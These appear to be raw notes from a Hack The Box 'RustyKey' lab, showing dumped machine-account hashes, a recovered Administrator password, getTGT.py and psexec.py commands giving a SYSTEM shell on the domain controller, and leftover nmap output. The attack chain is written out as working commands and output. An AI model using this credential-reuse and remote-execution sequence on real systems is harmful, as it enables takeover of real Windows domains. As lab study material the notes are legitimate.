RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword
RUSTYKEY\Administrator:Rustyrc4key#!
Administrator:Rustyrc4key#!
getTGT.py rustykey.htb/Administrator:'Rustyrc4key#!' -dc-ip 10.129.242.90
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass administrator@dc.rustykey.htb
┌──(root㉿kali)-[/home/kali/BOXES/RUSTYKEY/10.129.242.90]
└─# psexec.py -k -no-pass administrator@dc.rustykey.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on dc.rustykey.htb.....
[*] Found writable share ADMIN$
[*] Uploading file avOFZyJO.exe
[*] Opening SVCManager on dc.rustykey.htb.....
[*] Creating service QzwM on dc.rustykey.htb.....
[*] Starting service QzwM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
dc
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE
Directory of C:\Users\Administrator\Desktop
06/24/2025 10:00 AM <DIR> .
06/24/2025 10:00 AM <DIR> ..
09/03/2025 04:22 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,515,936,768 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
63277/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
